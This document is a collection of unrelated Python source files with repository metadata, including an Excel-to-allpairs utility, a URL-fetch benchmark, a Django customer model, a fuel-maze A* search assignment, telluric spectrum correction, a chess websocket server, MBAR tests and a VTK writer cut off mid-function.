#coding:utf-8 ''' Created on Jul 3, 2012 @author: DUNG ''' import xlrd from myparser import * import os,sys,re def time(func): import time def Function(*args1,**args2): start_time = time.time() back = func(*args1,**args2) end_time = time.time() print "%.10fs taken for (%s)" % (end_time-start_time,func.__name__) return back return Function def get_tmp_txt(bk,sheets): for sheet in sheets: try: sheet_txt = file("tmp_"+sheet+".txt","w") sh = bk.sheet_by_name(sheet) nrows = sh.nrows ncols = sh.ncols for row in range(nrows): for col in range(ncols): cell_data = sh.cell_value(row,col) if col != ncols-1: sheet_txt.write(cell_data+"\t") else: sheet_txt.write(cell_data+"\n") finally: sheet_txt.close() def get_tmp_txt_name(): path = os.path.abspath(os.getcwd()) files = os.listdir(path) test = re.compile(r"^tmp_.*\.txt$", re.IGNORECASE) tmp_txt_files = filter(test.search, files) return tmp_txt_files def get_allpairs_txt(sheets,tmp_txt_files): allpairs_txt_names = [] for sheet,tmp_txt in zip(sheets,tmp_txt_files): allpairs_txt_name = "allpairs_"+sheet+".txt" os.system("allpairs "+tmp_txt+">"+allpairs_txt_name) allpairs_txt_names.append(allpairs_txt_name) return allpairs_txt_names def delete_tmp_txts(tmp_txt_files): path = os.path.abspath(os.getcwd()) for tmp_txt_file in tmp_txt_files: os.remove(path+"\\"+tmp_txt_file) def update_excel_file(excel_file,sheets,allpairs_txt_names): pass def all_pairs(): excel_file = sys.argv[1] bk = xlrd.open_workbook(excel_file) sheets = bk.sheet_names() get_tmp_txt(bk,sheets) tmp_txt_files = get_tmp_txt_name() allpairs_txt_names = get_allpairs_txt(sheets, tmp_txt_files) delete_tmp_txts(tmp_txt_files) update_excel_file(excel_file, sheets, allpairs_txt_names) all_pairs()
UTF-8
Python
false
false
2,012
8,452,495,682,974
28feade8d478279dc9040c3ca6cd0614a1e62f9b
2be91d9d16821dda202a6f14438c21161394b6bc
/query_model/query_urls.py
dd1c02509885034fd77e4ab2e2950bad7ef0b9ef
[]
no_license
dmr/query-model
https://github.com/dmr/query-model
fe11e8e033e81b091632d006b0c2c031c8c71fb2
3a0f9442ee6a3133f6e9ca6c9c2bac6202cf5926
refs/heads/master
2018-12-28T07:20:32.646907
2013-01-09T01:43:40
2013-01-09T01:43:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- import human_curl import json from query_model.query_url_implementations import ( run_human_curl_async, run_curl_multiprocessing, run_urllib2_multiprocessing ) from query_model.predict_lookup_time import predict_lookup_time def query_urls( uri_count, parallelism, actor_source, method, compare_all ): def get_actor_list(actor_source, limit): actor_urls = [str(u) for u in json.loads( human_curl.get(actor_source).content) ] if len(actor_urls) < limit: print "Reusing actors. Maybe start more real actors" while len(actor_urls) < limit: actor_urls.extend(actor_urls) return actor_urls[:limit] actor_urls = get_actor_list(actor_source=actor_source, limit=uri_count) if compare_all: best_result = None for m in ( run_human_curl_async, run_curl_multiprocessing, run_urllib2_multiprocessing ): result = m(url_list=actor_urls, parallelism=parallelism) if not best_result or result < best_result: best_result = result _prediction = predict_lookup_time( uri_count=uri_count, parallelism=parallelism ) else: return method(url_list=actor_urls, parallelism=parallelism) def main(): import argparse parser = argparse.ArgumentParser( "Measure different implementations for get many urls" ) parser.add_argument("-n", "--uri_count", default=20, type=int, help="Urls to crawl during a test. Default: 20" ) parser.add_argument("-p", "--parallelism", default=5, type=int, help=("Run query with <p> parallelism. Default: 5") ) parser.add_argument( "-s", "--actor-source", required=True, type=str, help=("Source that responds with a JSON list " "of actor URIs.") ) parser.add_argument( "-m", "--method", default=run_human_curl_async.__name__, choices=(run_human_curl_async.__name__, run_curl_multiprocessing.__name__, run_urllib2_multiprocessing.__name__), help=("Which method to use for query") ) parser.add_argument( "--compare-all", action="store_true", default=True, help=("Compare all implementations and include simulation") ) parsed_args = parser.parse_args().__dict__ if not parsed_args['method'] in globals(): raise argparse.ArgumentError("Invalid choice! " "Please pass run_human_curl_async, run_curl_multiprocessing " "or run_urllib2_multiprocessing" ) parsed_args['method'] = globals()[parsed_args['method']] query_urls(**parsed_args)
UTF-8
Python
false
false
2,013
7,533,372,645,952
3624f0e758ed831b52b9baf722942aaff3800cbd
0cfd8b6a98339468457b6539b48ce77fcdac5543
/common/customer/migrations/0001_initial.py
248a656b26a947caa6fbe96701e6044ce21470e7
[]
no_license
vaputa/chain-hotel-book-system
https://github.com/vaputa/chain-hotel-book-system
ecf4a99f93c5ef37907be7698e2c913f4a41bc56
9c92f7b31d4a7884384ab2e8c07e171ef4aa8e3a
refs/heads/master
2016-09-09T18:36:12.254936
2014-12-31T06:12:01
2014-12-31T06:12:01
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ] operations = [ migrations.CreateModel( name='Customer', fields=[ ('customer_id', models.AutoField(serialize=False, primary_key=True)), ('credit', models.IntegerField(default=0)), ('email', models.EmailField(max_length=254)), ('phone', models.CharField(max_length=20)), ('password', models.CharField(max_length=20)), ('status', models.CharField(max_length=20)), ], options={ }, bases=(models.Model,), ), ]
UTF-8
Python
false
false
2,014
16,810,502,006,829
6f68dbbf73761446053bee134de0c6d98b4999dd
7ec1c8d7d45830a9530d867048bd7fdc59b167c1
/pyy/prac/maximum.py
b3a6edf67ac1f9bd9f2c2058e928ac666515442e
[]
no_license
nave91/parch
https://github.com/nave91/parch
e180db939c23445363945a80ed45069d3d2708f7
170e5c398fad8d674e0306fa63336c39e159b2ab
refs/heads/master
2020-05-18T12:04:38.110061
2014-12-04T02:57:02
2014-12-04T02:57:02
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import random lst = [random.randint(1,100)*random.randint(1,100) for i in range(1,10)] def maximum(lst): m = -1 for i in lst: if i > m: m = i return m def maximum2(lst): for _i,i in enumerate(lst): for _j,j in enumerate(lst): if i<j: break if _j+1 == len(lst): return i print lst print maximum(lst) print maximum2(lst)
UTF-8
Python
false
false
2,014
7,344,394,102,265
8b5051a8b16bba4d7162ee496b8b51a0d12a05ef
2361f5cff20e21c21f1c6c9cfb006667a3a570ef
/setup.py
f587ccbb9eed07e473cbb2d24a3de8b1a3f87dca
[]
no_license
dmwoods38/pySecurityCenter
https://github.com/dmwoods38/pySecurityCenter
3461166c7adf1e1a8c9fca915618389b840a5b63
f1ece77dcd3ac3d2928bb43b0635a160715a3b61
refs/heads/master
2020-12-26T03:34:54.812497
2013-08-20T17:37:30
2013-08-20T17:37:30
18,523,682
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from distutils.core import setup import sys import securitycenter # A simple little hack to generate the RST file for pretty formatting for pypi. try: import pypandoc with open('README', 'w') as pypidoc: pypidoc.write(pypandoc.convert('README.md', 'rst')) except: pass # These are the requirements for pySecurityCenter requirements = [] # If we are running on something thats not 2.6 or 2.7, we will need the # simplejson module. Python versions less than 2.6 need specifically version # 2.1.0 as newer ones break on python 2.4. The reason we need simplejson on # versions greater than 2.7 is that it seems like the typcasting on the json # module in version 3.x is too strict, and is causing a lot of issues. extra = {} if sys.version_info < (2, 6, 0): requirements.append('simplejson==2.1.0') if sys.version_info > (3,): requirements.append('simplejson') extra['use_2to3'] = True setup( name='pySecurityCenter', version=securitycenter.__version__, description='Security Center 4 API Module', author=securitycenter.__author__, author_email=securitycenter.__author_email__, url=securitycenter.__url__, py_modules=['securitycenter'], install_requires=requirements, classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Information Technology', 'License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python :: 2.4', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Topic :: Software Development :: Libraries :: Application Frameworks', ], **extra )
UTF-8
Python
false
false
2,013
10,505,490,017,857
e38ff956d7a99a7fa3b7a62ce3640968ce1f5bbb
307d17f7a994d4ea75923105508a55dce0df408c
/A1/fuelmaze.py
a05a9015e412850598c2aaff872c987c0c05310a
[]
no_license
B-1P/AI_assignmnets
https://github.com/B-1P/AI_assignmnets
62429eb99438fd3858fce163073ea2987a8ba8ad
de9930bbbb1fdc27b23cae0167f481d38be4d75e
refs/heads/master
2020-04-11T04:13:00.731814
2014-10-14T14:34:12
2014-10-14T14:34:12
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
'''FuelMaze Domain Starter code for 384-A1, Last modified: September 30th, 2014 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% CSC384 Fall 2014, Assignment 1 %% %% NAME: %% %% STUDENT NUMBER: %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ''' from problem import * #@UnusedWildImport from math import * import time class FuelmazeState: def __init__(self, pos, fuel): '''Initializes the state where pos is a (X,Y) tuple representing the robot position, fuel is the remaining fuel supply of the robot ''' self.pos = pos self.fuel = fuel def __repr__(self): '''Returns a string representation of the state (i.e. the robot position)''' ret = "(X, Y, fuel) = ({},{},{})".format(self.pos[0], self.pos[1], self.fuel) return ret class Fuelmaze(Problem): def __init__(self, width, height, capacity, fuelstations, obstacles, start_pos, start_fuel, goal_pos): '''Initializes a fuelmaze where width is the size of the maze along the x-axis, height is the size of the maze along the y-axis (y-axis points downward), capacity is the amount of fuel the robot can carry fuelstations is a list of (X,Y) tuples representing where there are fuel stations in the maze, obstacles is a list of (X,Y) tuples representing where there are obstacles in the maze, start_pos is a (X,Y) tuple representing the start position, start_fuel is the amount of fuel the robot starts with, goal_pos is a (X,Y) tuple representing the goal position. Do not change.''' Problem.__init__(self, FuelmazeState(start_pos, start_fuel), FuelmazeState(goal_pos, 0)) self.width = width self.height = height self.capacity = capacity self.fuelstations = fuelstations self.obstacles = obstacles # Implement this! def successors(self, state): '''Return a list of (action, cost, successor) tuples where action is the string name of the action performed in state to reach successor cost is the cost of performing action in state successor is the result of performing action in state ''' '''Valid action names: Right Left Up Down Refuel''' States = list() # Generate the states here if(state.fuel > 0): if((state.pos[0] < self.width - 1) and (not (state.pos[0] + 1, state.pos[1]) in self.obstacles)): States.append(("Right", 1, FuelmazeState((state.pos[0] + 1, state.pos[1]), state.fuel - 1))) if((state.pos[0] > 0) and (not (state.pos[0] - 1, state.pos[1]) in self.obstacles)): States.append(("Left", 1, FuelmazeState((state.pos[0] - 1, state.pos[1]), state.fuel - 1))) if((state.pos[1] < self.height - 1) and (not (state.pos[0], state.pos[1] + 1) in self.obstacles)): States.append(("Down", 1, FuelmazeState((state.pos[0], state.pos[1] + 1), state.fuel - 1))) if((state.pos[1] > 0) and (not (state.pos[0], state.pos[1] - 1) in self.obstacles)): States.append(("Up", 1, FuelmazeState((state.pos[0], state.pos[1] - 1), state.fuel - 1))) if(state.pos in self.fuelstations): States.append(("Refuel", 1, FuelmazeState(state.pos, self.capacity))) #time.sleep(1) #print(States) return States # Implement this! def hashable_state(self, state): '''Return a tuple of the state's values that represents the state such that equivalent states result in equivalent tuples.''' return (state.pos[0], state.pos[1], state.fuel) # Implement this! def goal_check(self, state): # If we had a single goal state we could use the following test: # return self.hashable_state(self.goal) == self.hashable_state(state) # We do not specify a target fuel in our goal states, alter this test so that # it only checks position, not fuel #print(self.hashable_state(state)) return (state.pos == self.goal.pos) # The given NULL heuristic (do not change) def fuelmaze_h_uniform(problem, state): # Causes algorithm to do uniform cost search #print(problem.hashable_state(state)) return 0 # # Implement the Manhattan Distance def fuelmaze_h_manhattan(problem, state): #print(problem.hashable_state(state)) return (sqrt(sum((a - b) ** 2 for a, b in zip(state.pos, problem.goal.pos)))) # # Implement your own heuristic def fuelmaze_h_custom(problem, state): return (problem.capacity - state.fuel) '''---------------------------------------------------------------------- Definitions of three sample instances that you will run your code. Do not change these! You are strongly encouraged to also test your code with other fuelmazes of various sizes and start/goal positions (simply add more fuelmazes to the list). -------------------------------------------------------------------------''' if __name__ == "__main__": from search import * #@UnusedWildImport # # TEST CASES # # A LIST OF FUELMAZES TO BE TESTED: # # fuelmaze1: 9x9 fuelmaze, start 1/1, goal 9/9 # # fuelmaze2: 9x9 fuelmaze, start 1/1, goal 9/9 # # fuelmaze3: 9x9 fuelmaze, start 1/1, goal 8/2 fuelmazes = [ Fuelmaze(9, 9, 25, [(8, 6)], [(3, 0), (3, 1), (2, 2), (1, 3), (1, 6), (1, 7), (0, 8), (2, 5), (3, 4), (4, 3), (5, 2), (5, 1), (6, 1), (6, 4), (6, 5), (7, 6), (5, 5), (5, 7), (8, 7)], (0, 0), 25, (8, 8)), Fuelmaze(9, 9, 10, [(0, 8)], [(0, 1), (2, 3), (4, 4), (5, 6), (0, 6), (7, 4), (8, 7), (7, 6), (4, 8), (5, 8)], (0, 0), 10, (8, 8)), Fuelmaze(9, 9, 30, [], [(1, 0), (2, 1), (3, 2), (3, 4), (2, 5), (1, 6), (4, 3), (5, 2), (6, 1), (5, 5), (6, 6), (7, 7), (4, 4)], (0, 0), 30, (7, 1)) ] heuristics = [ ('Uniform heuristic', fuelmaze_h_uniform), ('Manhattan-Distance heuristic', fuelmaze_h_manhattan), ('Custom heuristic', fuelmaze_h_custom) ] # Set this to >=1 to get increasingly informative search statistics trace = 1 for m in range(len(fuelmazes)): maze = fuelmazes[m] for (hname, h) in heuristics: maze.set_heuristic(h) print("====================================================") print("Fuelmaze {}, {}, A* with cycle checking".format(m + 1, hname)) node = astar_search(maze, FullCheck(), trace) print("====================================================") print("")
UTF-8
Python
false
false
2,014
4,647,154,655,806
f334f9be3bf30f4da1464eb12c9af0c6c057bd09
24866a4924fdea813f63dca737e34ff924c1c7e9
/server.py
f1aeab42a96ea05b8b4e04690474f25ac8a75aa4
[ "MIT" ]
permissive
lazytype/ultimatechess
https://github.com/lazytype/ultimatechess
91f202beb35055c513ea7dd52b59ad973a0f3778
ae36c6b2d5500df957bc28a86234a1802a568143
refs/heads/master
2020-04-19T14:35:12.636244
2014-01-05T23:43:13
2014-01-05T23:43:13
13,733,909
0
0
null
false
2014-01-05T23:43:13
2013-10-21T05:42:46
2014-01-05T23:43:13
2014-01-05T23:43:13
428
0
0
0
Python
null
null
from chesstools import Board from chesstools import Move import tornado.ioloop import tornado.web import tornado.websocket import tornado.escape from tornado.options import define, options from collections import namedtuple define("port", default=8888, help="Run the server on the given port", type=int) STATIC_PATH = 'ultimatechess' def _fen_layout_fixed(self): pieces = [] for row in self.position: c = 0 rstring = '' for piece in row: if piece: if c: rstring += str(c) c = 0 rstring += str(piece) else: c += 1 if c: rstring += str(c) pieces.append(rstring) return '/'.join(pieces) Board._fen_layout = _fen_layout_fixed games = {} class Game(object): def __init__(self, name, white_player): self.has_black = False self.white_player = white_player self.name = name self.boards = [] self.state = [] for i in xrange(4): self.boards.append(Board()) # self.boards[i].move(self.boards[i].all_legal_moves()[0]) self.state.append(self.boards[i].fen()) games[name] = self def move(self, index, move): print 'called with move: ', move source = move['from'] target = move['to'] movement = Move(source, target) if self.boards[index].is_legal(movement): self.boards[index].move(movement) self.state[index] = self.boards[index].fen() return True return False def found_black(self, black_player): self.has_black = True self.black_player = black_player self.white_player.write_message(tornado.escape.json_encode({'response_type': 'opponent_found'})) def write_message(self, player, raw_message): raw_message['player'] = 'white' if self.white_player is player else 'black' message = tornado.escape.json_encode(raw_message) self.white_player.write_message(message) self.black_player.write_message(message) @staticmethod def parse_position(pos): column = 'abcdefgh'.index(pos[0].lower()) row = int(pos[1]) - 1 return (row, column) @staticmethod def get_quadrant(move): target = move['to'] if target[0] in 'abcd' and target[1] in '5678': return 1 elif target[0] in 'abcd': return 3 elif target[1] in '5678': return 2 else: return 4 @classmethod def create_and_register(cls, name, white_player): game = cls(name, white_player) games[name] = game return game # class MainHandler(tornado.web.RequestHandler): # def get(self): # self.write('hello, world') class WebSocketHandler(tornado.websocket.WebSocketHandler): def open(self): print 'new connection' def on_message(self, message): print 'message received %s' % message try: data = tornado.escape.json_decode(message) except: return if 'create' in data: name = data['create'] if name in games: if games[name].has_black: self.write_message(tornado.escape.json_encode({ 'response_type': 'creation', 'success': False, 'created': False})) else: self.name = name games[name].found_black(self) self.write_message(tornado.escape.json_encode({ 'response_type': 'creation', 'success': True, 'created': False, 'state': games[name].state, 'player': 'black' })) else: try: game = Game.create_and_register(name, self) self.write_message(tornado.escape.json_encode({ 'response_type': 'creation', 'success': True, 'created': True, 'state': game.state, 'player': 'white'})) self.name = name except Exception, e: print e self.write_message(tornado.escape.json_encode({ 'response_type': 'creation', 'success': False, 'created': False})) elif 'move' in data and 'name' in data and data['name'] in games: game = games[data['name']] try: index = data['index'] move = data['move'] moved = game.move(index, move) quadrant = Game.get_quadrant(move) player = game.write_message(self, { 'response_type': 'movement', 'moved': moved, 'index': index, 'source': move['from'], 'target': move['to'], 'quadrant': quadrant}) except: self.write_message(tornado.escape.json_encode({ 'response_type': 'movement', 'moved': False})) if moved: pass def on_close(self): if self.name in games: del games[self.name] print 'connection closed' if __name__ == '__main__': tornado.options.parse_command_line() application = tornado.web.Application([ (r'/static/(.*)', tornado.web.StaticFileHandler, {'path': STATIC_PATH}), (r'/ws', WebSocketHandler), ]) application.listen(options.port) tornado.ioloop.IOLoop.instance().start()
UTF-8
Python
false
false
2,014
1,597,727,841,113
1f49fbda1f1378dec7012f2687a48528d023c58d
e43a47dbddf1b08818bff8b7c611fb93995487df
/ApplyTelluricCorrection.py
11c9765b46fdd2282ee9a545ba3d57c364d19785
[ "GPL-3.0-only" ]
non_permissive
kgullikson88/LasCampanas-MIKE
https://github.com/kgullikson88/LasCampanas-MIKE
fd7fa3954d47e4a9e2ee543d2dec727eaf7f6b44
52848aa3f87b4ac10248991a8d5e980c478dfeb3
refs/heads/master
2016-09-08T00:52:18.656901
2014-06-06T17:00:05
2014-06-06T17:00:05
16,586,991
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from astropy.io import fits as pyfits import sys from scipy.interpolate import InterpolatedUnivariateSpline as interp import matplotlib.pyplot as plt import DataStructures import os import FittingUtilities import HelperFunctions import numpy plot = True plotorder = 29 def ReadCorrectedFile(fname, yaxis="model"): orders = [] headers = [] hdulist = pyfits.open(fname) numorders = len(hdulist) for i in range(1, numorders): order = hdulist[i].data xypt = DataStructures.xypoint(x=order.field("wavelength"), y=order.field(yaxis), cont=order.field("continuum"), err=order.field("error")) orders.append(xypt) headers.append(hdulist[i].header) return orders, headers def Correct(original, corrected, offset=None): #Read in the data and model original_orders = HelperFunctions.ReadFits(original, extensions=True, x="wavelength", y="flux", errors="error", cont="continuum") corrected_orders, corrected_headers = ReadCorrectedFile(corrected) test_orders, header = ReadCorrectedFile(corrected, yaxis="flux") if plot: order = test_orders[plotorder] model = corrected_orders[plotorder] #for order, model in zip(test_orders, corrected_orders): plt.plot(order.x, order.y/order.cont) plt.plot(model.x, model.y) plt.title("Correction in corrected file only") plt.show() print len(original_orders), len(corrected_orders) if offset == None: offset = len(original_orders) - len(corrected_orders) offset = 0 for i in range(offset, len(original_orders)): data = original_orders[i] data.cont = FittingUtilities.Continuum(data.x, data.y) try: model = corrected_orders[i-offset] header = corrected_headers[i-offset] print "Order = %i\nHumidity: %g\nO2 concentration: %g\n" %(i, header['h2oval'], header['o2val']) except IndexError: model = DataStructures.xypoint(x=data.x, y=numpy.ones(data.x.size)) print "Warning!!! Telluric Model not found for order %i" %i if plot and i == plotorder: plt.figure(1) plt.plot(data.x, data.y/data.cont) plt.plot(model.x, model.y) if model.size() < data.size(): left = numpy.searchsorted(data.x, model.x[0]) right = numpy.searchsorted(data.x, model.x[-1]) if right < data.size(): right += 1 data = data[left:right] elif model.size() > data.size(): sys.exit("Error! Model size (%i) is larger than data size (%i)" %(model.size(), data.size())) badindices = numpy.where(numpy.logical_or(data.y <= 0, model.y < 0.05))[0] model.y[badindices] = data.y[badindices]/data.cont[badindices] data.y /= model.y original_orders[i] = data.copy() if plot: plt.show() return original_orders def main1(): if len(sys.argv) > 2: original = sys.argv[1] corrected = sys.argv[2] outfilename = "%s_telluric_corrected.fits" %(original.split(".fits")[0]) print "Outputting to %s" %outfilename corrected_orders = Correct(original, corrected, offset=None) column_list = [] if plot: plt.figure(2) for i, data in enumerate(corrected_orders): if plot and i == plotorder: plt.plot(data.x, data.y/data.cont) #Set up data structures for OutputFitsFile columns = {"wavelength": data.x, "flux": data.y, "continuum": data.cont, "error": data.err} column_list.append(columns) HelperFunctions.OutputFitsFileExtensions(column_list, original, outfilename, mode="new") if plot: plt.title("Corrected data") plt.show() else: allfiles = os.listdir("./") corrected_files = [f for f in allfiles if "Corrected_" in f and f.endswith("-1.fits")] #original_files = [f for f in allfiles if any(f in cf for cf in corrected_files)] #hip_files = [f for f in allfiles if (f.startswith("HIP_") or f.startswith("HR_")) and not f.endswith("-0.fits")] #for original, corrected in zip(original_files, corrected_files): for corrected in corrected_files: idx = corrected.index("_") original = corrected[idx+1:].replace("-1.fits", "-0.fits") print original, corrected outfilename = "%s_telluric_corrected.fits" %(original.split(".fits")[0]) print "Outputting to %s" %outfilename corrected_orders = Correct(original, corrected, offset=None) column_list = [] if plot: plt.figure(2) for i, data in enumerate(corrected_orders): if plot and i == plotorder: plt.plot(data.x, data.y/data.cont) #Set up data structures for OutputFitsFile columns = {"wavelength": data.x, "flux": data.y, "continuum": data.cont, "error": data.err} column_list.append(columns) HelperFunctions.OutputFitsFileExtensions(column_list, original, outfilename, mode="new") if plot: plt.title(original) plt.xlabel("Wavelength (nm)") plt.ylabel("Flux") plt.show() if __name__ == "__main__": main1()
UTF-8
Python
false
false
2,014
11,914,239,287,507
fcaa848f30d4f4bc5c44449c6e8dc1d8e9efa43b
cee4118a42ddb415642b90682942e2fecccb3676
/tests/test_mbar_harmonic_oscillators.py
b0cdee7d7be85fc92f3e3b719c2aae5c30509c2f
[ "GPL-2.0-or-later", "GPL-1.0-or-later", "GPL-2.0-only", "LGPL-2.1-only" ]
non_permissive
gchevrot/pymbar
https://github.com/gchevrot/pymbar
495c73faec8bf59a6a769db92903372cf7c6f3dc
99ed41a849b27b67dcaeb70995cda989f899c502
refs/heads/master
2020-12-30T19:57:39.801064
2014-05-07T22:31:46
2014-05-07T22:31:46
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""Test MBAR by performing statistical tests on a set of of 1D harmonic oscillators. for which the true free energy differences can be computed analytically. """ import numpy as np from pymbar import MBAR from pymbar.testsystems import harmonic_oscillators from pymbar.utils import ensure_type from pymbar.utils_for_testing import eq z_scale_factor = 3.0 # Scales the z_scores so that we can reject things that differ at the ones decimal place. TEMPORARY HACK O_k = np.array([1.0, 2.0, 3.0]) k_k = np.array([1.0, 1.5, 2.0]) N_k = np.array([50, 60, 70]) def test_analytical_harmonic_oscillators(): """Harmonic Oscillators Test: generate test object and calculate analytical results.""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) mu = test.analytical_means() variance = test.analytical_variances() f_k = test.analytical_free_energies() def test_harmonic_oscillators_samples(): """Harmonic Oscillators Test: draw samples via test object.""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) x_n, u_kn, N_k = test.sample([5, 6, 7], mode='u_kn') x_n, u_kn, N_k = test.sample([5, 5, 5], mode='u_kn') x_n, u_kn, N_k = test.sample([1, 1, 1], mode='u_kn') x_kn, u_kln, N_k = test.sample([5, 6, 7], mode='u_kln') x_kn, u_kln, N_k = test.sample([5, 5, 5], mode='u_kln') x_kn, u_kln, N_k = test.sample([1, 1, 1], mode='u_kln') def test_harmonic_oscillators_mbar_free_energies(): """Harmonic Oscillators Test: can MBAR calculate correct free energy differences?""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) x_kn, u_kln, N_k_output = test.sample(N_k) eq(N_k, N_k_output) mbar = MBAR(u_kln, N_k) fe, fe_sigma = mbar.getFreeEnergyDifferences() fe, fe_sigma = fe[0,1:], fe_sigma[0,1:] fe0 = test.analytical_free_energies() fe0 = fe0[1:] - fe0[0] z = (fe - fe0) / fe_sigma eq(z / z_scale_factor, np.zeros(len(z)), decimal=0) def test_exponential_mbar__xkn(): """Harmonic Oscillators Test: can MBAR calculate E(x_kn)??""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) x_kn, u_kln, N_k_output = test.sample(N_k) eq(N_k, N_k_output) mbar = MBAR(u_kln, N_k) mu, sigma = mbar.computeExpectations(x_kn) mu0 = test.analytical_means() z = (mu0 - mu) / sigma eq(z / z_scale_factor, np.zeros(len(z)), decimal=0) def test_exponential_mbar_xkn_squared(): """Harmonic Oscillators Test: can MBAR calculate E(x_kn^2)??""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) x_kn, u_kln, N_k_output = test.sample(N_k) eq(N_k, N_k_output) mbar = MBAR(u_kln, N_k) mu, sigma = mbar.computeExpectations(x_kn ** 2) mu0 = test.analytical_x_squared() z = (mu0 - mu) / sigma eq(z / z_scale_factor, np.zeros(len(z)), decimal=0)
UTF-8
Python
false
false
2,014
5,377,299,066,596
173858b4a9d1e344dd06540c391befb5e3326519
ad0db7fff7be389d501169cf66b31177ab252cb6
/5.py
434e5202930443d03dd1b574efc4ddc893f122c4
[]
no_license
hosemagi/Project-Euler-Solutions
https://github.com/hosemagi/Project-Euler-Solutions
63d094637353dc8ea6b9a2c3cab5d70a98b28219
b862a28e18480ab448ce827efc17d248b3191c5c
refs/heads/master
2020-04-02T02:53:32.554577
2011-05-29T08:12:33
2011-05-29T08:12:33
1,816,660
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import math from datetime import datetime print "Solving..." starttime = datetime.now() found = False # haven't found number yet num = 20 # starting state while not found: # while we haven't found an answer for i in range(2,21): # begin checking divisibility for each factor in [2,3,...,20] if num % i == 0: # if the number is divisible by the current factor if i == 20: # and the current factor is 20 print num # we found the answer found = True else: # otherwise if the current factor is not 20 continue # proceed to check next factor in [2,3,...,20] else: # if the current factor doesn't divide into the number we're testing num += 20 # get a new number (must be a multiple of 20 so increase by 20) break # break out of the inner for loop endtime = datetime.now() elapsed = endtime - starttime print "Solution took " + str(elapsed)
UTF-8
Python
false
false
2,011
12,927,851,566,197
0469a5553d6d789e54a9683d936a3ad57fbaff90
9065f211832fddb5b2ffcab03cf2653422c24f05
/Lib/OldPeyeQM/write.py
bd0590cfc37d52766a9006f4f98750068f67c464
[ "MIT" ]
permissive
bebopsan/peyeQM
https://github.com/bebopsan/peyeQM
5208b65e5432e0a413b15702ab53109a04f724b8
d87137a4f42b446b4a7a008d966d0632eca0cdfd
refs/heads/master
2016-09-06T00:58:20.354890
2014-10-30T17:34:18
2014-10-30T17:34:18
2,502,525
2
1
null
null
null
null
null
null
null
null
null
null
null
null
null
#! /usr/bin/python ## module Write # -*- coding: utf8 -*- """ This module contains functions to write mesh files (pre-defined file formats). """ __all__=['write_vtk','write_msh','write_solver_input'] __author__="Edward Y. Villegas and Santiago Echeverri" import numpy as np from numpy import linspace as lin from numpy import hstack def write_vtk(filename, title, SET, points, cells, data): """ WriterVTK write VTK ASCII files from matrixes of point coords and list of element nodes whit their data vector/matrix. Parameters: ----------- filename: String which contain filename and path of the output file. title: Title of data (256 characters). SET: Geometry/topology. STRUCTURED_POINTS STRUCTURED_GRID UNSTRUCTURED_GRID POLYDATA RECTILINEAR_GRID FIELD. POLYDATA by default (other still not implemented). points: Matrix of point coords. cells: Matrix of list of element nodes. data: Matrixes of data with arguments. Each set of data has 3 arguments in a list (first add point_data and then cell_data) * datatype: SCALARS, VECTORS, NORMALS, TENSORS (from matrix future) * dataname: List of string names of data (default option future) * datamatrix: list of matrices with data Returns: -------- """ fid = open(filename,'w') fid.write('# vtk DataFile Version 2.0\n') if title == '': title = 'Data' if SET == '': SET = 'POLYDATA' fid.write(title+'\n') fid.write('ASCII\n') fid.write('DATASET '+SET+'\n') n = points.shape[0] # number-of-points datatype = 'double' # Future datatype will be extracted from ndarray.dtype fid.write('POINTS '+str(n)+' '+datatype+'\n') np.savetxt(fid, points, fmt = '%6.6f') m = cells.shape # number-of-elms and number-of-nodes by elm fid.write('POLYGONS '+str(m[0])+' '+str(m[0]*(m[1]+1))+'\n') # elm, elm*(nodbyelm+1) +1 is because include number-of-nodes of polygon count = 0 while count < m[0]: new_elm = np.array(m[1],dtype=int) new_elm = np.hstack([new_elm, cells[count,:]]) if count: cellsvtk = np.vstack([cellsvtk,new_elm.copy()]) else: cellsvtk = new_elm.copy() count = count + 1 np.savetxt(fid,cellsvtk,fmt='%d') ndata = len(data)/3 # sets of data to visualize print 'ndata', ndata if not ndata: print len(data),"arguments, but you need to put 3 arguments by set of data." return count = 0 point_data = 0 cell_data = 0 # From this point it writes for each type of data SCALARS, VECTORS, NORMALS, TENSORS while count < ndata: if len(data[1])!=len(data[2]): print 'Wrong labeling, or... something else' break else: # This else is made to avoid wrong labels DataPerType = len(data[2]) # Is the number of data for each type #------ Write over each element on a given category---------------------- k=0 while k < DataPerType: p = data[3*count+2][k].shape #---------------------------Headers--------------------------------- if (p[0] == n) and (not point_data): fid.write("POINT_DATA "+str(n)+"\n") point_data = 1 elif (p[0] == m[0]) and (not cell_data): fid.write("CELL_DATA "+str(m[0])+"\n") elif (not point_data) and (not cell_data): print "Data Matrix", count, "does not match size with nodes neither elements" count = count + 1 continue #----------------- When we have many sets: --------------------------- # fid.write("\\\ The following number tells the amount of Scalar vectors to read") # fid.write('\n'+'\\\ '+str(p[1])+'\n') count2 = 0 while count2 < p[1]: if data[3*count+1] == '': data[3*count+1] = 'Data '+str(count+1)+str(count2) TYPE = 'double' fid.write(data[3*count]+' '+data[3*count+1][k]+ \ '_'+str(count2)+' '+TYPE+'\n') 